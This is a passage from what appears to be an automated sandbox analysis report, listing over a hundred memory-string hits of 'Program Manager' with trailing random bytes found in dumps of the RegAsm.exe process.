                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q k^
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,!G
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtQ?
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,Ae
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXZ1
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD/z
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`k0
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qR@
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$tW
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qphd
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpHF
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH8s
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(\4
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@JI
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(|R
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@jg
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPIr
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx7y
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDSB
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX|D
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpJ;
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q< p
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtrf
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLdA
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0m
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh9<
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|aR
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,#<
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL!Y
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT1a
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt/l
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\!9
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP6
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|b>
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX9\
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTw|
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql%U
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt5]
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q46w
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP/3
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8a<
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`-p
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql&A
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDy?
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlD
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(a\
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0qd
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx]v
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH_y
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,I9
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLGV
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<(D
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPpx
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0R2
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx_k
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx?M
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`Q8
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$Ya
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<Gv
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q48l
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8c1
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLH_
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|F\
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0P}
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd6i
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx}_
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0,u
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`N)
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDwJ
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX<Z
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qo6
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$6E
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx;c
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8~y
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp}
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpnC
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<fV
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql#`
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,GD
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTUi
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\DU
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh]D
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q q2
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP->
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\EA
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@pF
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\fh
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp6
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@-^
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH=f
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd4t
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q o}
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$8:
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtvP
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<&O
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`+{
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh_)
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDxS
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh~k
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh^M
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh>/
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH2_
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH0
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(T`
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh1h
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@Bu
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt)X
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$,5
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLZx
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd(o
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qgb
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql[A
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<}b
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@#C
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTkw
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHuG
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX44
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxu9
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXTR
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd*d
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD+[
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXtp
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$mz
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql}T
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q83k
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql]6
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTLE
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPC^
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(67
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@Dj
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|:L
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,<r
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL<O
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$NH
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpBg
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL\m
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp"I
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD(]
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL8e
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\^q
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlyj
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlYL
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql9.
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0BC
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxO|
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`ag
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`AI
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHS4
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhPS
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp`[
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHsR
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtiB
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qjC
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp>}
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(2M
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@ b
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(Rk
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,}0
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdHX
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDkE
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxqO
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxQ1
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd&z
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$*@
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0cj
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4K
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHt>
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<[O
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp T
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTId
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<{m
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxsD
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$lq
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDlN
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL|V
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXr{
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtjK
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\|6
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q81v
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT*2
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|Xu
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpFQ
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp&3
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q87U
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP%j
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8Ws
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdNl
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qcx
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0iI
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd.N
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql>V
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4/H
